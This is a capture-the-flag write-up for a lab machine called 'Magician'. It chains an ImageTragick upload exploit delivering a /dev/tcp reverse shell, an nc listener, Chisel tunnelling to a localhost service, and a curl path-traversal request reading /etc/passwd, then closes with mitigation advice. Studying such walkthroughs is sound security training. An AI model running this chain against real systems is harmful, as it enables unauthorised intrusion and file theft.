Magician is one of those boxes that looks simple at first glance but quickly turns into a layered exercise in chaining weaknesses together. What starts as a basic file upload feature becomes command execution, internal pivoting, and ultimately full file disclosure. This machine mirrors a very real-world pattern: a small oversight in one component quietly opens the door to everything behind it.

Below is the complete attack path — not just what worked, but why it worked.

1️⃣ Initial Reconnaissance

Nmap Scan

nmap -sC -sV -p- magician

Why this scan?
The goal was full visibility from the beginning. Scanning all TCP ports prevents hidden services from being missed, while default scripts and version detection provide early clues to misconfigurations and outdated software.

Findings

• 21/tcp → FTP
• 8080/tcp → Java-based web application
• 8081/tcp → Nginx frontend

The web application immediately stood out as the primary attack surface.

2️⃣ Initial Foothold — ImageMagick Command Injection (CVE-2016–3714)

The upload functionality processed images using ImageMagick. That alone isn’t unusual — but outdated or improperly configured ImageMagick installations are dangerous.

The system was vulnerable to CVE-2016–3714, widely known as ImageTragick.

This vulnerability allows command injection through crafted MVG (Magick Vector Graphics) files. Even if a file is uploaded as “.jpg”, ImageMagick may parse it based on its content rather than its extension.

Payload Source

The payload structure was adapted from PayloadsAllTheThings under the ImageTragick section. Instead of reinventing the wheel, I used a tested template and modified it for a reverse shell callback.

Crafting the Malicious File

nano imagetragik1_payload_imageover_reverse_shell_devtcp.jpg

The file appeared to be a JPEG, but it contained MVG directives that, when processed, executed a reverse shell via/dev/tcp.

Why the exploit worked

• No strict MIME validation
• Dangerous coders (like MVG) left enabled
• No sandboxing of image processing
• Vulnerable ImageMagick version

Result

Once uploaded and processed:

• Command execution triggered
• Reverse shell connected back
• Interactive shell obtained as user “magician.”

Initial foothold achieved.

3️⃣ Reverse Shell Access

On the attacker machine:

nc -lvnp 4444

The connection came in cleanly. We now had shell access as the magician user.

From here, the mindset shifts. Initial access is only step one. The real objective is to understand what else is hiding inside the system.

4️⃣ Internal Service Enumeration

With a shell established:

netstat -tulnp

Why enumerate again internally?
External scans only show what’s exposed to the network. Internal enumeration often reveals services developers assumed were “safe” because they were bound to localhost.

Discovery

• 127.0.0.1:6666 → Hidden local service
• 8080 → Java upload app
• 8081 → Nginx frontend
• 21 → FTP

The key finding was a service listening exclusively on 127.0.0.1:6666.

This is a common security misconception. Developers often bind services to localhost, assuming it provides sufficient protection. However, once an attacker has established a foothold, localhost binding offers little defense.

Pivoting became the next move.

5️⃣ Pivoting with Chisel

To reach the internal service, I created a reverse tunnel using Chisel.

On the attacker's machine

chisel server -p 9001 - reverse

On the target machine

./chisel client 192.168.178.228:9001 R:6666:127.0.0.1:6666

This exposed the target’s localhost port 6666 to my machine.

Now the hidden service was accessible locally at:

http://127.0.0.1:6666

This phase reflects real-world red team tactics. After initial access, attackers frequently pivot internally, where misconfigurations, exposed services, and overlooked assets often present the most significant security gaps

6️⃣ Exploiting the Internal Flask Application

The service accepted a filename parameter via a POST request.

To test for traversal:

curl -X POST -d "filename=../../../../etc/passwd" http://127.0.0.1:6666/

What happened

The application read the file and returned its contents — but encoded.

This confirmed a path traversal vulnerability leading to arbitrary file read.

The application trusted user-supplied input and directly used it in filesystem operations. That trust was misplaced.

7️⃣ Decoding the Output

The returned content was encoded in formats such as hex or binary.

If hex:

echo "726f6f74…" | xxd -r -p

If binary:

echo "1010100 1001000 …" | perl -lpe '$_=pack("B*",join("",split))'

Once decoded, the contents of /etc/passwd were visible. From there, sensitive files like /root/root.txt could be retrieved.

At this point, file disclosure was fully confirmed.

Full Attack Chain

External reconnaissance

→ File upload vulnerability
 → CVE-2016–3714 exploitation
 → Reverse shell as magician
 → Internal enumeration
 → Discovery of localhost service
 → Reverse tunneling with Chisel
 → Path traversal exploitation
 → Sensitive file retrieval

Every step is built on the previous one. No single exploit was particularly complex — but chained together, they led to complete compromise.

Defensive and Mitigation Insights

Patch ImageMagick

• Upgrade to a patched version
• Conduct regular dependency audits

Harden policy.xml

Disable dangerous coders such as MVG, URL, HTTPS, and EPHEMERAL.

Secure file uploads

• Strict server-side MIME validation
• Re-encode images safely
• Store uploads outside web root
• Apply sandboxing

Prevent path traversal

• Normalize file paths
• Reject traversal sequences like ../
• Use strict filename allowlists
• Never directly concatenate user input into file operations

Protect internal services

• Require authentication even on localhost
• Enforce least privilege
• Monitor for reverse tunneling activity

Final Thoughts

Magician reinforces a simple truth: small vulnerabilities rarely stay small.

A file upload flaw led to command execution. Command execution exposed internal services. An internal service revealed sensitive files. Each weakness amplified the next.

This is how real intrusions unfold — quietly, methodically, and step by step.

And that’s exactly what made this box worth documenting.